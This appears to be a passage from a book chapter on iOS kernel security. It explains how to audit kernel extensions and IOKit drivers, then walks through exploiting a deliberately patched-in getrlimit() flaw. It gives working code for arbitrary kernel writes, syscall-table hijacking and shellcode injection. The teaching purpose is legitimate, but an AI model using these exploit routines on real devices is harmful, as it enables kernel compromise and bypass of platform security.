A second spot to look for vulnerabilities in kernel extensions is in the handlers for the network protocols they add. Each network protocol includes a number of interesting handlers that should be checked for vulnerabilities. The most commonly vulnerable code is located in the handlers called by the setsockopt() system call or that parse incoming network packets. To find these vulnerabilities you must first find all places in the code that register network protocols. At the binary level this comes down to calls of the function net_add_proto(). The first parameter to this function is a pointer to a protosw structure, which, among general information about the new network protocol, also contains function pointers to all the protocol-specific handlers. The protosw structure is defined as follows:

struct protosw {
   short pr_type;              /* socket type used for */
   struct domain *pr_domain;   /* domain protocol a member of */
   short pr_protocol;          /* protocol number */
   unsigned int pr_flags;      /* see below */
/* protocol-protocol hooks */
   void     (*pr_input)(struct mbuf *, int len);
                               /* input to protocol (from below) */
   int  (*pr_output)(struct mbuf *m, struct socket *so);
                               /* output to protocol (from above) */
   void (*pr_ctlinput)(int, struct sockaddr *, void *);
                               /* control input (from below) */
   int  (*pr_ctloutput)(struct socket *, struct sockopt *);
                               /* control output (from above) */
/* user-protocol hook */
   void *pr_ousrreq;
/* utility hooks */
   void (*pr_init)(void);      /* initialization hook */
   void (*pr_unused)(void);    /* placeholder - fasttimo is removed */
   void (*pr_slowtimo)(void);  /* slow timeout (500ms) */
   void (*pr_drain)(void);     /* flush any excess space possible */
   int  (*pr_sysctl)(int *, u_int, void *, size_t *, void *, size_t);
                               /* sysctl for protocol */
   struct pr_usrreqs *pr_usrreqs;   /* supersedes pr_usrreq() */
   int  (*pr_lock)(struct socket *so, int locktype, void *debug);
                               /* lock function for protocol */
   int  (*pr_unlock)(struct socket *so, int locktype, void *debug);
                               /* unlock for protocol */
   void *(*pr_getlock)(struct socket *so, int locktype);
   ...
};

The pr_input handler defined in this structure is called whenever a packet of the specific protocol is received and requires parsing. A vulnerability in this parser would allow remote exploitation of the kernel through malformed packets on the network. This kind of vulnerability is nearly extinct, and therefore it is very unlikely that you will find a problem in this code. However, one of the kernel extensions inside iOS might add a protocol that is not as well audited as the standard network protocols. The second field of interest is the pr_ctloutput handler. This handler gets called whenever the setsockopt() system call is called on a socket of this protocol type. The latest example of this vulnerability type is the kernel exploit that was used for untethering iOS 4.3 to iOS 4.3.3 jailbreaks. The vulnerability was an overflow in the integer-multiplication for memory allocation inside the pr_ctloutput handler of the ndrv (NetDriver) protocol.
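To illustrate the general vulnerability class mentioned above, the following Python sketch models an allocation size that is computed with 32-bit integer multiplication. It is a generic illustration and not the actual ndrv code; the function names, the element size, and the element count are made-up values.

```python
MASK32 = 0xFFFFFFFF


def alloc_size_32(count, element_size):
    """Model an unchecked 32-bit multiplication: the result wraps around."""
    return (count * element_size) & MASK32


def checked_alloc_size_32(count, element_size):
    """Same computation, but refuse results that do not fit in 32 bits."""
    total = count * element_size
    if total > MASK32:
        raise OverflowError("allocation size does not fit in 32 bits")
    return total


count = 0x20000001   # attacker-supplied number of elements (example value)
element_size = 8     # size of one element in bytes (example value)

print("requested elements: %d" % count)
print("bytes actually allocated: %d" % alloc_size_32(count, element_size))

try:
    checked_alloc_size_32(count, element_size)
    rejected = False
except OverflowError:
    rejected = True
print("checked version rejects the request:", rejected)
```

With these values the wrapped product is only 8 bytes, so any later loop that copies count elements into the allocation writes far beyond its end.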

The third common spot for vulnerabilities in kernel extensions is the sysctl interface. This interface is a mechanism for the kernel and for its extensions to provide read and write access to kernel state variables to processes with appropriate privilege levels. To register a new sysctl variable, the kernel function sysctl_register_oid() has to be called, with a sysctl_oid structure as parameter that defines the new kernel state variable. By searching the kernelcache for all cross-references to this function, it is possible to find all sysctl variables registered by kernel extensions, and these can be analyzed in depth. To understand the possible security problem arising from sysctl variables, you have to look into the definition of the sysctl_oid structure:

struct sysctl_oid {
   struct sysctl_oid_list  *oid_parent;
   SLIST_ENTRY(sysctl_oid) oid_link;
   int                     oid_number;
   int                     oid_kind;
   void                    *oid_arg1;
   int                     oid_arg2;
   const char              *oid_name;
   int                     (*oid_handler) SYSCTL_HANDLER_ARGS;
   const char              *oid_fmt;
   const char              *oid_descr;
   int                     oid_version;
   int                     oid_refcnt;
};

Ignoring the fact that a kernel extension could register a sysctl variable that provides access to some security-related kernel state to unprivileged processes, basically two different security problems can arise from sysctl variables. The first problem is related to the defined oid_handler. The kernel defines a number of predefined handlers for standard variable types like integers, strings, and opaque values. These handlers have existed for a long time and have been audited by several parties. It is very unlikely that passing a very long string to them through the sysctl() system call will result in a buffer overflow. The same cannot be said for handlers registered by closed-source kernel extensions for non-standard variable types. Therefore, it is a good idea to check all registered sysctl variables for non-standard handlers and audit each of them carefully.

A security problem in one of the variable handlers will usually lead to an immediately exploitable situation that is triggered by passing illegal values to the sysctl() system call. There is another danger arising from sysctl variables that you have to look for separately. Whenever there is a sysctl entry that provides write access to a kernel state variable, this opens up the possibility for user space code to directly attack code paths inside the kernel that use this variable. Such a problem could be, for example, an integer variable that influences the amount of memory that is allocated within the kernel. A user space process that can manipulate this value might be able to trigger an integer overflow inside a kernel-level memory allocation. Therefore, every kernel-level read access to a writable kernel state variable must be audited for the presence of security checks.
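The integer overflow scenario described above can be illustrated with a small user space sketch. The function names checked_alloc_size() and unchecked_alloc_size() are hypothetical and do not exist in the kernel; they only model what a 32-bit allocation size calculation looks like with and without a security check on a user-controlled count.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of an unchecked kernel path: the 32-bit product
 * silently wraps around when count is large enough. */
uint32_t unchecked_alloc_size(uint32_t count, uint32_t elem_size)
{
    return count * elem_size;
}

/* Hypothetical checked variant: returns 0 and stores the size on success,
 * or -1 if count * elem_size does not fit into 32 bits. */
int checked_alloc_size(uint32_t count, uint32_t elem_size, uint32_t *out)
{
    if (elem_size != 0 && count > UINT32_MAX / elem_size)
        return -1;                 /* the product would overflow */
    *out = count * elem_size;
    return 0;
}
```

With a count of 0x40000001 and an element size of 4, the unchecked version yields an allocation size of only 4 bytes, while the code that later fills the buffer still believes it has room for 0x40000001 elements. This is the kind of missing check you are looking for when auditing readers of a writable sysctl variable.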

Finding Vulnerabilities in IOKit Drivers

The process of finding vulnerabilities inside IOKit drivers is basically the same as finding vulnerabilities in other kernel extensions or the kernel itself. However, the use of C++ inside IOKit drivers adds to the possible vulnerability classes that can be found. This includes a number of C++-only vulnerability classes:

  • Mismatched usage of new and delete, such as using delete[] to delete a single object
  • Object use after free vulnerabilities
  • Object type confusion vulnerabilities

In addition to these typical C++ vulnerabilities, the attack surface of IOKit drivers is bigger, because they make use of the IOKit API, which defines interfaces that allow a user space driver to communicate with the kernel-level driver. To support this, an IOKit driver must implement a so-called user client, which is a class derived from IOUserClient, that enables a user space tool to connect to a device and communicate with its driver. The process of connecting to a device starts by looking it up in the IOKit registry. To do this, you first create a matching dictionary and then call one of the possible matching functions. Assume you want to look up the AppleRGBOUT device, because it was involved in one of the recent kernel exploits:

kern_return_t   kernResult;
io_iterator_t   iterator;
kernResult = IOServiceGetMatchingServices(kIOMasterPortDefault,
 IOServiceMatching("AppleRGBOUT"), &iterator);

On success, the iterator variable is filled with an io_iterator_t object that can be used to iterate over all the devices found. To get the first matching device, the function IOIteratorNext() is called once. In case of success a non-null object is returned.

io_service_t service;
service = IOIteratorNext(iterator);
if (service != IO_OBJECT_NULL) {
   ...

The user space tool can now call IOServiceOpen() to open the service and connect to the device:

io_connect_t connect;
kernResult = IOServiceOpen(service, mach_task_self(), 0, &connect);

All kernel exploits against the IOKit API have to start with code very similar to this. Because the majority of all IOKit drivers are closed source, and therefore most probably not as deeply audited as the open source parts of iOS, we strongly believe that a lot of vulnerabilities are still hidden inside IOKit drivers. For example, it is possible to crash the iOS kernel by simply trying to open the AppleBCMWLAN device as a non-root user. Once the user space tool is connected to a device, the connection can be used to communicate with the kernel driver in several different ways.

Attacking through Device Properties

The first possible route of attack is to change the properties associated with a device. You can do this by either setting one specific property with the IOConnectSetCFProperty() function or by setting all properties at once by calling IOConnectSetCFProperties(), which at the driver level results in a call to the method setProperty() or to the method setProperties():

int myInteger = 0x55667788;
CFNumberRef myNumber = CFNumberCreate(kCFAllocatorDefault,
kCFNumberIntType, &myInteger);
kernResult = IOConnectSetCFProperty(connect, CFSTR("myProp"), myNumber);

This code creates a number object from a normal int variable and then attempts to set a device property called myProp to this value. This attempt fails if the driver does not override the setProperty() method, which is required to allow setting a property. The kernel driver might also decide to let it fail, because it does not know a property of this name, or because it expects a different object type. For example, the property could be a string instead of a number. It is up to the driver whether to check for this and reject invalid object types, so you must audit the setProperty() method to evaluate how invalid properties or object types are handled. A similar problem will arise if you change the code to set multiple properties at the same time:

int myInteger = 0x55667788;
CFNumberRef myNumber = CFNumberCreate(kCFAllocatorDefault,
kCFNumberIntType, &myInteger);
kernResult = IOConnectSetCFProperties(connect, myNumber);

This version of the code passes the number object through the function IOConnectSetCFProperties(), which finally calls the setProperties() method of the driver object. The problem is that your code sends a number object, while the method expects a dictionary object. This is, however, not enforced and therefore it is up to the implementation of the kernel driver to ensure that it is dealing with a dictionary object before any attempt to enumerate the dictionary's content. And even if a dictionary object is supplied, there is still the possibility that one of the contained properties is of an unexpected type.

Setting properties is not the only way to communicate with a kernel driver. The IOUserClient interface defines more direct communication methods like direct memory mapping and external traps and methods. Though it might be possible to find vulnerabilities exposed through direct memory mapping, we don't cover these within this chapter. The curious reader can, however, take a look into the IOKit drivers that override the method clientMemoryForType() in their user client implementation and use it as a starting point for further investigations. This includes the classes IOAccessoryPortUserClient, AppleMultitouchSPIUserClient, and IOAudio2DeviceUserClient.

Attacking through External Traps and Methods

A more promising place to look for vulnerabilities is the set of external traps and methods a user client can define. These are traps and methods that can be called directly from user space to make the driver perform some action and return the result. Many of the IOKit drivers offer these kinds of services to user space clients. The difference between traps and methods is that external traps are part of the Mach trap system and external methods are more like pure IOKit functionality. An IOKit driver can choose to offer both, one, or none of these external interfaces.

User space code can call external traps defined within an IOKit driver by index, through the iokit_user_client_trap() Mach trap, with up to six parameters:

kernResult = iokit_user_client_trap(connect, index, p1, p2, 0, 0, 0, 0);

The kernel-level user client implementation can offer these traps by overriding the IOUserClient methods getExternalTrapForIndex() and getTargetAndTrapForIndex(). This creates the potential for two different kinds of security problems. First, the numerical index of the trap called could be trusted within the driver and used as an index into a lookup table. If the lookup uses an unchecked index, an attacker might choose the index so that the trap function pointer is looked up from an attacker-defined memory page, which would lead to immediate kernel code execution. The second possibility is that the offered external traps have security problems themselves, because they put too much trust in the trap arguments. Therefore, the trap handler code should be audited for both kinds of security problems.
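The first problem class, an index that is trusted during the table lookup, can be sketched in plain C. This is only a user space model: the names trap_entry, trap_table, and lookup_trap() are hypothetical and are not taken from any real driver. It shows the bounds check you should expect to find in a correct implementation.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical trap handler type with two of the six possible arguments. */
typedef int (*trap_fn)(uintptr_t p1, uintptr_t p2);

struct trap_entry { trap_fn func; };

static int trap_noop(uintptr_t p1, uintptr_t p2) { (void)p1; (void)p2; return 0; }
static int trap_add(uintptr_t p1, uintptr_t p2)  { return (int)(p1 + p2); }

/* Hypothetical lookup table of the traps a user client offers. */
static const struct trap_entry trap_table[] = { { trap_noop }, { trap_add } };
#define TRAP_COUNT (sizeof(trap_table) / sizeof(trap_table[0]))

/* Returns the table entry for index, or NULL if the index is out of range.
 * Without the comparison, a large index would read a function pointer from
 * memory far outside the table. */
const struct trap_entry *lookup_trap(uint32_t index)
{
    if (index >= TRAP_COUNT)
        return NULL;
    return &trap_table[index];
}
```

When you audit a real driver, the equivalent of the comparison against TRAP_COUNT is what you look for in the disassembly. Signed comparisons deserve special attention, because a negative index passes a check that only tests the upper bound.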

Very similar and related, but a bit more complicated, are external methods. External methods can be called through various functions of the IOKit API, depending on the number and type of input and output parameters that you want to work with. Depending on which version of the IOKit API you are using, there are different API functions available to call the methods. However, we will just concentrate on the most general way to call an external method within modern code. It is through the IOConnectCallMethod() function:

kern_return_t
IOConnectCallMethod(
   mach_port_t    connection,         // In
   uint32_t       selector,           // In
   const uint64_t *input,             // In
   uint32_t       inputCnt,           // In
   const void     *inputStruct,       // In
   size_t         inputStructCnt,     // In
   uint64_t       *output,            // Out
   uint32_t       *outputCnt,         // In/Out
   void           *outputStruct,      // Out
   size_t         *outputStructCnt)   // In/Out
AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;

The function is called with a lot of parameters to allow a broad usage. The first two arguments define the connection to the driver and the numerical index of the function called. The following four arguments describe the input parameters to the external method, and the remaining four arguments describe the possible output parameters. For input and output, there are two types of arguments each: scalar and structure. Scalar parameters are just 64-bit integers, and structure parameters are arbitrary data structures in a format known only to the kernel driver and its user space client. There can be multiple scalar input and output parameters, but only one structure as input and output, and you must submit the size of the structure.

At the kernel level, IOKit drivers can implement external methods by overriding one of several methods of the IOUserClient class. The most general method that can be overridden is the externalMethod() method. This method is not only responsible for finding the selected external method, but it also checks the supplied parameters against the requirements, calls the actual method, and handles the output in the correct way. User clients that completely override this method have to either pass execution to the parent method or implement everything on their own, which can be the cause of lots of security problems. Therefore, the overridden externalMethod() methods should be carefully audited. A more convenient way to implement this is to override one of the helper methods used by the base implementation. These helper methods are getAsyncTargetAndMethodForIndex(), getExternalMethodForIndex(), getExternalAsyncMethodForIndex(), and getTargetAndMethodForIndex(). Each of these methods is supposed to look up the external method by index and optionally determine the target object. No matter which method the user client implementation overrides, you have to check that it validates the index and that an illegal index does not lead to arbitrary lookups in attacker-controlled memory pages. And again, the actual external methods have to be audited for the usual security problems arising from putting too much trust into function arguments.

While reversing the IOKit drivers within the kernelcache and looking for IOKit-related vulnerabilities, the scripts within the idaios toolkit, combined with the new IDA 6.2 list filtering feature, will come in very handy, as demonstrated in Figure 9.5.

Figure 9.5 IDA Filtering IOKit Drivers


Kernel Exploitation

This section discusses the exploitation of four very common vulnerability classes you face in kernel exploitation. It explains the involved vulnerabilities in detail and shows how exploits can be built for each of them. The discussion contains C code snippets of the original exploits used. It is, however, important to realize that since the introduction of the iOS 4.3 kernel, no known shortcuts exist to disable the code-signing functionality, even as the root user. In versions prior to iOS 4.3, it was possible for the root user to disable the security.mac.proc_enforce and security.mac.vnode_enforce sysctl entries from user space. This would disable several security checks in the code-signing functionality and allow the user to launch kernel exploits from an incorrectly signed Mach-O binary. But with the introduction of iOS 4.3, these sysctl entries were made read-only. Therefore, all kernel exploits for more recent versions of iOS have to be implemented as 100 percent return oriented programming (ROP) payloads, unless they are launched from within a process that has dynamic code-signing capabilities. Launching kernel exploits as a non-root user always had this requirement.

Arbitrary Memory Overwrite

Exploiting an arbitrary kernel memory overwrite vulnerability allows you to write anything you want anywhere within the kernel's address space. Although vulnerabilities like this have been found and fixed in the past, this example doesn't exploit a real vulnerability, but instead shows you how to patch the kernel and introduce an artificial vulnerability. Before you can do this, you need a kernel binary with the jailbreaking kernel patches already applied. The easiest way to create this is to use the kernel patch generator by comex. You can find it on GitHub at http://github.com/comex/datautils0. Once compiled, it provides two utilities that you can use to create a jailbroken kernel. We will not go into the actual kernel patches it provides at this point, because this is discussed in Chapter 10.

$ ./make_kernel_patchfile kernelcache.iPod4,1_4.3.5_8L1.decrypted
 mykernelpatchfile
$ ./apply_patchfile kernelcache.iPod4,1_4.3.5_8L1.decrypted 
    mykernelpatchfile kernelcache.iPod4,1_4.3.5_8L1.patched
vm_map_enter (0x80043fc8)
vm_map_protect (0x8004115e)
AMFI (0x80618394)
-debug_enabled initializer (0x80204d9c)
task_for_pid 0 (0x801a7df6)
cs_enforcement_disable (0x8027eb5c)
proc_enforce (0x8029c1e4)
USB power (0x805eab92)
sb_evaluate hook (0x8061b6d4)
sb_evaluate (0x80938e9c)

Patching a Vulnerability into the Kernel

Now that you have a jailbroken kernel binary you can add your own vulnerability into it. To do this you have to find and replace the following bytes in the kernel binary:

Original 68 46 10 22 F7 F6 26 EC F3 E7 00 BF
Patched  68 46 10 22 F7 F6 70 EE 00 20 F2 E7
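If you prefer not to apply this patch by hand in a hex editor, a few lines of C are enough. The following is a minimal sketch that works on a copy of the decrypted kernel already loaded into memory. The function name patch_image() is hypothetical, and the decision to refuse patching when the pattern occurs more than once is an extra safety assumption, not something required by the patch itself.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Byte sequences taken from the listing above. */
static const unsigned char original_bytes[12] = {
    0x68, 0x46, 0x10, 0x22, 0xF7, 0xF6, 0x26, 0xEC, 0xF3, 0xE7, 0x00, 0xBF
};
static const unsigned char patched_bytes[12] = {
    0x68, 0x46, 0x10, 0x22, 0xF7, 0xF6, 0x70, 0xEE, 0x00, 0x20, 0xF2, 0xE7
};

/* Searches image for the original bytes and replaces them in place.
 * Returns the offset of the patch, or -1 if the pattern is missing or
 * occurs more than once (in which case nothing is modified). */
long patch_image(unsigned char *image, size_t size)
{
    long found = -1;
    size_t i;

    for (i = 0; i + sizeof(original_bytes) <= size; i++) {
        if (memcmp(image + i, original_bytes, sizeof(original_bytes)) == 0) {
            if (found != -1)
                return -1;         /* ambiguous match, do not guess */
            found = (long)i;
        }
    }
    if (found != -1)
        memcpy(image + found, patched_bytes, sizeof(patched_bytes));
    return found;
}
```

Note that the branch instructions inside these byte sequences are position dependent, so the pattern is only expected to match the specific kernel used in this example.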

You then use the redsn0w utility from the iPhone Dev Team to boot the patched kernel:

$ ./redsn0w  -j -k kernelcache.iPod4,1_4.3.5_8L1.patched -a "-v"

Before you continue, take a look at the patch you applied and how the introduced vulnerability looks. The code you patched is within the getrlimit() system call. Within the system call handler, you can find the following code near the end that uses the copyout() function to copy the result back into user space. The copyout() function is responsible for checking that the destination address is actually within user space memory so that one cannot write the result into kernel memory. The disassembly of the original code is:

80175628   MOV    R0, SP
8017562A   MOVS   R2, #0x10
8017562C   BLX    _copyout
80175630   B      loc_8017561A

The applied patch changes the call of copyout() into a call of ovbcopy(), which does not perform any checks and therefore allows a target address to be specified anywhere within kernel memory. In addition to that, the applied patch clears the R0 register to signal a successful copy operation, which looks in assembly like this:

80175628   MOV    R0, SP
8017562A   MOVS   R2, #0x10
8017562C   BLX    _ovbcopy
80175630   MOVS   R0, #0
80175632   B      loc_8017561A

This means you can write the result of the getrlimit() system call to kernel memory, by using a pointer to kernel memory as second parameter:

getrlimit(RLIMIT_CORE, (struct rlimit *)0x80101010);

Because this vulnerability allows you to write an rlimit structure anywhere in kernel memory, you have to look into its definition:

struct rlimit {
   rlim_t  rlim_cur; /* current (soft) limit */
   rlim_t  rlim_max; /* hard limit */
};

Within iOS, the data-type rlim_t is a 64-bit unsigned integer, but only 63 of its bits are used. The highest bit is supposed to be zero. Therefore, only the first seven bytes of the result can be arbitrarily chosen. This is not a problem, because you can perform the exploit repeatedly. There is also the restriction that the value of rlim_cur is not allowed to be greater than rlim_max. This means your exploit code needs to use a resource limit that is initially set to infinity (all 63 bits set), because otherwise not all seven bytes can be written. In the case of RLIMIT_CORE, this is the default. So to write the bytes 11 22 33 44 55 66 77 to the kernel, you have to do something like this:

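struct rlimit rlp;
getrlimit(RLIMIT_CORE, &rlp);          /* fetch the current limits */
rlp.rlim_cur = 0x77665544332211ULL;    /* bytes 11 22 33 44 55 66 77 in memory */
setrlimit(RLIMIT_CORE, &rlp);
getrlimit(RLIMIT_CORE, (struct rlimit *)0x80101010);  /* patched call writes into the kernel */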
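The relationship between the seven bytes you want to write and the value you have to store in rlim_cur can be sketched as follows. The helper names pack_rlim_cur() and is_valid_soft_limit() are hypothetical. The packing is written with shifts so that it describes the little-endian memory layout of the target independently of the machine the sketch is compiled on.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* All 63 usable bits set, which the text above describes as infinity. */
#define MODEL_RLIM_INFINITY 0x7fffffffffffffffULL

/* Packs up to seven bytes into a 64-bit limit so that bytes[0] ends up at
 * the lowest memory address on a little-endian target. The eighth byte,
 * and with it the highest bit, stays zero. */
uint64_t pack_rlim_cur(const unsigned char *bytes, size_t len)
{
    uint64_t value = 0;
    size_t i;

    if (len > 7)
        len = 7;
    for (i = 0; i < len; i++)
        value |= (uint64_t)bytes[i] << (8 * i);
    return value;
}

/* Models the two restrictions described above: the highest bit must be
 * zero and the soft limit must not exceed the hard limit. */
int is_valid_soft_limit(uint64_t cur, uint64_t max)
{
    return (cur >> 63) == 0 && cur <= max;
}
```

Any seven-byte value produced this way is smaller than the infinity value, which is why a resource limit whose hard limit is infinity places no further restriction on the bytes you can write.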

To write an arbitrary amount of data to the kernel, you can wrap this exploit into a function that repeatedly uses the vulnerability:

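void writeToKernel(unsigned char *addr, unsigned char *buffer,
size_t len)
{
    struct rlimit rlp;
    /* start from the current limits, which keeps rlim_max unchanged */
    getrlimit(RLIMIT_CORE, &rlp);
    /* write seven attacker-chosen bytes per call */
    while (len > 7) {
        memcpy(&rlp, buffer, 7);
        setrlimit(RLIMIT_CORE, &rlp);
        getrlimit(RLIMIT_CORE, (struct rlimit *)addr);
        len -= 7; buffer += 7; addr += 7;
    }
    /* write the remaining bytes (at most seven) */
    memcpy(&rlp, buffer, len);
    setrlimit(RLIMIT_CORE, &rlp);
    getrlimit(RLIMIT_CORE, (struct rlimit *)addr);
}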
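One detail of this approach is easy to miss: every call copies a complete 16-byte rlimit structure, although only seven bytes are under your control. The following user space model makes this visible. It is a simplified sketch, not the exploit itself: model_getrlimit() is a hypothetical stand-in for the patched system call, and the model clears rlim_cur before each chunk, which the function above does not do.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct model_rlimit { uint64_t rlim_cur; uint64_t rlim_max; };

/* Hypothetical stand-in for the patched getrlimit(): copies the whole
 * 16-byte structure to dst without any address check. */
static void model_getrlimit(const struct model_rlimit *limit, unsigned char *dst)
{
    memcpy(dst, limit, sizeof(*limit));
}

/* Writes len bytes in chunks of at most seven. Every chunk drags nine
 * uncontrolled bytes along, so the caller must tolerate nine clobbered
 * bytes behind the end of the data. */
void model_write(unsigned char *dst, const unsigned char *src, size_t len)
{
    struct model_rlimit rlp = { 0, 0x7fffffffffffffffULL };

    while (len > 0) {
        size_t chunk = len > 7 ? 7 : len;

        rlp.rlim_cur = 0;
        memcpy(&rlp.rlim_cur, src, chunk);  /* first bytes in memory */
        model_getrlimit(&rlp, dst);
        dst += chunk; src += chunk; len -= chunk;
    }
}
```

Because each chunk overwrites the uncontrolled tail of the previous one, only the bytes following the very last chunk remain damaged. When you choose a target in kernel memory, you therefore have to make sure that the data directly behind it is either unused or restored afterwards.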

Choosing a Target to Overwrite

Once you can write anything, you need to decide what you should overwrite. Historically, this has been used in Mac OS X kernel exploits to overwrite the process's user credentials inside kernel memory to elevate its privileges. For iOS and newer Mac OS X kernels, this is no longer sufficient, because you often have to deal with kernel-level sandboxing. Just changing the process's user ID to zero will not be enough to gain full access to the system. Instead, you always have to go for arbitrary code execution inside the kernel. To achieve this you need to overwrite a kernel-level function pointer or saved return address and redirect the kernel's execution path to your own code.

One way to do this is to overwrite one of the unused system call handlers in the system call table and then trigger the execution from user space by calling the system call in question. iOS contains quite a lot of unused system call table entries. The kernel exploits for jailbreaking the iPhone have used the table entries 0 and 207 before, without running into trouble from other software. The second problem you have to solve in your exploit is to introduce code into the kernel to which you can jump. You have many different ways to solve this, and several of them are discussed in the remaining sections. This example employs a specific attack that can be used when you can write anything anywhere in kernel memory. You overwrite the executable and writable slack space in kernel memory with your code. Such unused space you can find, for example, in the … Each contained kernel extension comes with a Mach-O header and has some unused space between the end of the header and the beginning of the next segment.

For this exploit it means you have to know the exact location of the system call table and the slack space in kernel memory. Because there is no ASLR protection at the kernel level, these addresses are static for the same device and kernel version and have to be found only once for all the released firmware builds. To cover all versions of iOS 4, without support for AppleTV, you have up to 81 different possible addresses. However, some of these addresses will be the same because, on the one hand, not every iOS version introduces (bigger) changes in the kernel and, on the other hand, the main kernel code segment is byte identical for devices of the same processor type. Therefore you can write a script for finding the addresses for all available kernels and create a lookup table for your kernel exploit.

Locating the System Call Table

Locating the system call table has become more difficult in recent kernel updates, because Apple has moved some kernel symbols around and removed others completely. Previously you could use symbols like kdebug_enable to locate the table easily. A new method for locating the table relies on the structure of the first entry and its relative position to the nsysent variable. An entry in the system call table is called sysent:

struct sysent {                /* system call table */
   int16_t sy_narg;            /* number of args */
   int8_t  sy_resv;            /* reserved  */
   int8_t  sy_flags;           /* flags */
   sy_call_t *sy_call;         /* implementing function */
   sy_munge_t *sy_arg_munge32; /* syscall arguments munger for 32-bit */
   sy_munge_t *sy_arg_munge64; /* syscall arguments munger for 64-bit */
   int32_t    sy_return_type;  /* system call return types */
   uint16_t   sy_arg_bytes;    /* Total size of arguments in bytes for
                                * 32-bit system calls
                                */
};

Because the first entry of the system call table is not actually an implemented system call, most of its structure elements are initialized to zero. The only fields set are the sy_return_type and sy_call elements. The return type is initialized to the value 1 and the handler is some pointer into the code segment of the kernel. In addition to that you know that the system call table is located within the data segment of the kernel. You can therefore scan the data segment for data that matches the definition of the first entry. To verify that you found the table, you can use the fact that the nsysent variable is stored directly behind the table. This means you start by choosing a guessed number of system calls, and check if the formula &nsysent = &sysent + sizeof(sysent) * nsysent validates. If not, you keep increasing, until you reach a high number, and have to assume that your guessed address for sysent was wrong. In this case, you have to continue searching within the data segment for the real first entry.

The idaiostoolkit contains a script that automates this search and also uses the syscalls.master file from the XNU source code to set all the symbols and function types for the system call handlers. The following is the script's output for the example iOS 4.3.5 firmware for iPod4:

Found syscall table _sysent at 802926e8
Number of entries in syscall table _nsysent = 438
Syscall number count _nsysent is at 80294ff8
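The verification step of this search can be sketched in a few lines of C that operate on a copy of the kernel's data segment. The function names guess_nsysent() and nsysent_address() are hypothetical and this is not the code of the script mentioned above. The entry size of 24 bytes is an assumption derived from the sysent definition shown earlier when compiled for a 32-bit ARM target with 4-byte pointers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed sizeof(struct sysent) on 32-bit ARM, including padding. */
#define SYSENT32_SIZE 24u

/* Reads a 32-bit little-endian value from a raw copy of the data segment. */
static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* For a candidate table offset, tries increasing entry counts n and checks
 * whether the 32-bit value stored directly behind n entries equals n.
 * Returns the count on success, or 0 if no count up to max_entries fits. */
uint32_t guess_nsysent(const uint8_t *data, size_t size,
                       size_t table_off, uint32_t max_entries)
{
    uint32_t n;

    for (n = 1; n <= max_entries; n++) {
        size_t count_off = table_off + (size_t)n * SYSENT32_SIZE;

        if (count_off + 4 > size)
            break;                 /* ran past the end of the segment */
        if (read_le32(data + count_off) == n)
            return n;
    }
    return 0;
}

/* The formula from the text: &nsysent = &sysent + sizeof(sysent) * nsysent */
uint32_t nsysent_address(uint32_t sysent_addr, uint32_t nsysent)
{
    return sysent_addr + nsysent * SYSENT32_SIZE;
}
```

Applying the formula to the output above confirms the result: 0x802926e8 plus 438 entries of 24 bytes each is 0x80294ff8, which is exactly the reported address of _nsysent.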

Constructing the Exploit

Finding a suitable slack space is much easier, because you just have to check the _PRELINK_TEXT segment for empty space after the Mach-O header of one of the kernel extensions. A suitable gap with a size of 3328 bytes is the memory between 0x8032B300 and 0x8032C000. You can use this within your exploit.

char shellcode[] = "\x01\x20\x02\x21\x03\x22\x04\x23\xFF\xFF";
struct sysent scentry;
unsigned char * syscall207 = (unsigned char *)(0x802926e8 + 207 * sizeof(scentry));
unsigned char * slackspace = (unsigned char *)0x8032B300;
   
memset(&scentry, 0, sizeof(scentry));
scentry.sy_call = (sy_call_t *)(slackspace + 1);  /* low bit set: Thumb mode */
scentry.sy_return_type = 1;
   
writeToKernel(slackspace, (unsigned char *)shellcode, sizeof(shellcode));
writeToKernel(syscall207, (unsigned char *)&scentry, sizeof(scentry));
syscall(207);

The shellcode in this exploit is simple thumb code that just moves some values into the registers R0-R3 and then panics due to an undefined instruction. This is merely to prove that some kind of execution occurred. Full kernel-level payloads are discussed in Chapter 10.

MOVS   R0, #1
MOVS   R1, #2
MOVS   R2, #3
MOVS   R3, #4
UNDEFINED
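If you want to check how these instructions map to the bytes of the shellcode string, the following sketch assembles them by hand. It relies on the 16-bit Thumb encoding of MOVS with an 8-bit immediate, which is 0x2000 combined with the register number shifted left by 8 and the immediate value. The helper names are hypothetical, and the halfword 0xFFFF is simply taken over from the exploit as the instruction that triggers the panic.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Encodes the 16-bit Thumb instruction "MOVS Rd, #imm8" for R0 to R7. */
uint16_t thumb_movs_imm(unsigned rd, unsigned imm8)
{
    return (uint16_t)(0x2000u | ((rd & 7u) << 8) | (imm8 & 0xffu));
}

/* Stores one halfword in little-endian byte order and returns the
 * offset of the next free byte. */
size_t emit16(unsigned char *out, size_t off, uint16_t insn)
{
    out[off]     = (unsigned char)(insn & 0xff);
    out[off + 1] = (unsigned char)(insn >> 8);
    return off + 2;
}

/* Builds the ten payload bytes: MOVS R0-R3 with the values 1-4, followed
 * by the halfword the exploit uses as an undefined instruction. */
size_t build_test_payload(unsigned char out[10])
{
    size_t off = 0;
    unsigned r;

    for (r = 0; r < 4; r++)
        off = emit16(out, off, thumb_movs_imm(r, r + 1));
    return emit16(out, off, 0xffff);
}
```

The generated bytes are 01 20 02 21 03 22 04 23 FF FF. The undefined instruction sits at offset 8 of the payload, which corresponds to the address 0x8032B308 when the payload is placed at the beginning of the slack space.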

When your exploit is executed it causes a kernel panic, and the paniclog shows that your code was executed and the registers were filled accordingly. The program counter PC shows that the crash occurred when an undefined kernel instruction from within the slack space was executed, and the value of R5 (0xcf, which is 207) hints at the execution of syscall handler 207.

panic(cpu 0 caller 0x8006fcf8): undefined kernel instruction
r0: 0x00000001  r1: 0x00000002  r2: 0x00000003  r3: 0x00000004
